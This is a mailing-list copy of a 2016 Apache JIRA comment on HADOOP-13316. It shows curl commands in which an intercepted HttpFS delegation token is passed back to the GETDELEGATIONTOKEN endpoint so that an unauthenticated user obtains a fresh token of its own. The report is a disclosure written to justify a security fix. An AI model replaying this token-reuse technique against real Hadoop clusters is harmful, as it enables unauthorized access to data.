You are viewing a plain text version of this content. The canonical link for it is here.
Posted to common-issues@hadoop.apache.org by "Xiao Chen (JIRA)" <ji...@apache.org> on 2016/06/24 03:43:16 UTC
[jira] [Commented] (HADOOP-13316) Delegation Tokens should not be
renewed or retrived using delegation token authentication
[ https://issues.apache.org/jira/browse/HADOOP-13316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15347638#comment-15347638 ]
Xiao Chen commented on HADOOP-13316:
------------------------------------
Example from HTTPFS:
1. Innocent user gets a token:
{noformat}
curl -i -L --negotiate -u: "http://xiaog-1.gce.cloudera.com:14000/webhdfs/v1/?op=GETDELEGATIONTOKEN"
HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
WWW-Authenticate: Negotiate
Content-Length: 0
Date: Fri, 24 Jun 2016 03:30:47 GMT
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 125
Date: Fri, 24 Jun 2016 03:30:47 GMT
{"Token":{"urlString":"IAAGaW1wYWxhBmltcGFsYQCKAVWAdb1aigFVpIJBWgECFLd6Bb7yTckDnGgC1e6FWQ0WlmirEldFQkhERlMgZGVsZWdhdGlvbgA"}}
{noformat}
2. Malicious user who used to have no auth:
{noformat}
[root@xiaog-1 ~]# curl -i -L --negotiate -u: "http://xiaog-1.gce.cloudera.com:14000/webhdfs/v1/?op=GETDELEGATIONTOKEN"
HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
WWW-Authenticate: Negotiate
Content-Length: 0
Date: Fri, 24 Jun 2016 03:36:19 GMT
{noformat}
3. Malicious user intercepts the token from innocent user, and happily gets its own:
{noformat}
[root@xiaog-1 ~]# curl -i -L --negotiate -u: "http://xiaog-1.gce.cloudera.com:14000/webhdfs/v1/?op=GETDELEGATIONTOKEN&delegation=IAAGaW1wYWxhBmltcGFsYQCKAVWAdb1aigFVpIJBWgECFLd6Bb7yTckDnGgC1e6FWQ0WlmirEldFQkhERlMgZGVsZWdhdGlvbgA"
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 125
Date: Fri, 24 Jun 2016 03:36:46 GMT
{"Token":{"urlString":"IAAGaW1wYWxhBmltcGFsYQCKAVWAezXcigFVpIe53AICFGoUkUqrWVq4n1aCuv3lpVihQrevEldFQkhERlMgZGVsZWdhdGlvbgA"}}
{noformat}
> Delegation Tokens should not be renewed or retrived using delegation token authentication
> -----------------------------------------------------------------------------------------
>
> Key: HADOOP-13316
> URL: https://issues.apache.org/jira/browse/HADOOP-13316
> Project: Hadoop Common
> Issue Type: Bug
> Components: kms, security
> Affects Versions: 2.6.0
> Reporter: Xiao Chen
> Assignee: Xiao Chen
> Priority: Blocker
>
> Delegation tokens are supposed to be exchanged in a secure authentication, for security concerns.
> For example, HDFS [only distribute or renew a delegation token under kerberos authentication|https://github.com/apache/hadoop/blob/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/namenode/FSNamesystem.java#L5164]
> {{DelegationTokenAuthenticationHandler}} used by KMS + HTTPFS doesn't follow this now, and poses security concerns. Details in comments.
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
---------------------------------------------------------------------
To unsubscribe, e-mail: common-issues-unsubscribe@hadoop.apache.org
For additional commands, e-mail: common-issues-help@hadoop.apache.org